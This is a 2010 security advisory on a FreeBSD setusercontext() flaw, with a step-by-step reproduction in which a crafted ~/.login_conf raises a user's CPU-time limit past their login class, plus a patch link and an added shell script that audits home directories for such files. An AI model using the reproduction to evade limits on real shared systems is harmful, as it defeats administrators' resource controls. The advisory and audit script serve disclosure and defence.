FreeBSD setusercontext() function security restriction bypass vulnerability
Release date: 2010-08-18
Updated on: 2010-08-19
Affected Systems:
FreeBSD 8.0
FreeBSD 7.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 42533
FreeBSD is an open-source Unix system that runs on Intel platforms and can be used freely.
The setusercontext() function in lib/libutil/login_class.c applies user-specific settings while running with the permissions of another user. This allows a local user to create a crafted ~/.login_conf file and then log in through OpenSSH to change some restricted resource limits.
<* Source: Andrey Zonov (andrey.zonov@gmail.com)
Link: http://secunia.com/advisories/40923/
http://www.freebsd.org/cgi/query-pr.cgi?pr=141840
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
1. Add a new login class in /etc/login.conf.
test:\
	:cputime=1h:\
	:tc=default:
2. Build the database.
# cap_mkdb /etc/login.conf
3. Change the account's login class.
# pw usermod $login -L test
4. Connect to the host over SSH as $login and execute limits-
$ limits-
Resource limits (current):
  cputime              3600 secs
  filesize             infinity kB
  datasize             524288 kB
  stacksize            65536 kB
  coredumpsize         infinity kB
  memoryuse            infinity kB
  memorylocked         infinity kB
  maxprocesses         3603
  openfiles            7207
  sbsize               infinity bytes
  vmemoryuse           infinity kB
  pseudo-terminals     infinity
  swapuse              infinity kB
5. Create ~/.login_conf.
me:\
	:cputime=2h:
6. Connect to the host again and execute limits-
$ limits-
Resource limits (current):
  cputime              7200 secs
  filesize             infinity kB
  datasize             524288 kB
  stacksize            65536 kB
  coredumpsize         infinity kB
  memoryuse            infinity kB
  memorylocked         infinity kB
  maxprocesses         3603
  openfiles            7207
  sbsize               infinity bytes
  vmemoryuse           infinity kB
  pseudo-terminals     infinity
  swapuse              infinity kB
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
FreeBSD
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.freebsd.org/cgi/query-pr.cgi?pr=141840
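
To find accounts that already carry a ~/.login_conf like the one in step 5, the following sh sketch lists every resource-limit capability set in per-user files. It is an added example, not part of the original advisory or of the FreeBSD patch. The /home base directory, the function names and the sample tree in demo() are assumptions; the capability names are the resource-limit keys from login.conf(5).

```shell
#!/bin/sh
# Added example: flag per-user ~/.login_conf files that set resource limits.
# Resource-limit capability names as documented in login.conf(5).
LIMIT_CAPS='cputime|filesize|datasize|stacksize|coredumpsize|memoryuse'
LIMIT_CAPS="$LIMIT_CAPS|memorylocked|maxproc|openfiles|sbsize|vmemoryuse"
LIMIT_CAPS="$LIMIT_CAPS|pseudoterminals|swapuse"

# Print "file<TAB>capability=value" for each resource-limit capability in one
# login.conf-style file. Entries are ':'-separated and may continue over
# backslash-newline; comment lines are dropped before splitting.
limit_caps_in_file() {
    sed -e '/^[[:space:]]*#/d' "$1" |
        tr ':' '\n' |
        sed -e 's/\\$//' -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' |
        { grep -E "^(${LIMIT_CAPS})(-cur|-max)?=" || true; } |
        while IFS= read -r cap; do
            printf '%s\t%s\n' "$1" "$cap"
        done
}

# Walk every home directory under $1 (assumed default: /home).
audit_login_conf() {
    base=${1:-/home}
    for f in "$base"/*/.login_conf; do
        [ -f "$f" ] || continue
        limit_caps_in_file "$f"
    done
}

# Constructed sample tree: alice reproduces step 5, bob only sets a locale.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/alice" "$tmp/bob"
    printf 'me:\\\n\t:cputime=2h:\n' > "$tmp/alice/.login_conf"
    printf 'me:\\\n\t:charset=UTF-8:\\\n\t:lang=en_US.UTF-8:\n' \
        > "$tmp/bob/.login_conf"
    audit_login_conf "$tmp"
    rm -rf "$tmp"
}

demo
```

Any line it prints names a file in which a user asks for a limit of their own; compare the value against the account's login class in /etc/login.conf.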